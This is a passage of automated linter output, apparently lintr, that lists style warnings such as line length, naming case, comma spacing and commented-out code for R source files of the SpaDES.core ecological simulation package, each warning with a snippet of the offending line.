{\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:365:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L365) *style:* **Commented code should be removed.**\n```r\n​            #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:380:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L380) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:384:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L384) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:385:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L385) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:386:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L386) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:425:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L425) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:448:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L448) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:540:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L540) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:567:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L567) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:575:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/cache.R#L575) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/16c0c3a4e93e33c91508fc9bc2a3ee9412477ea8/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             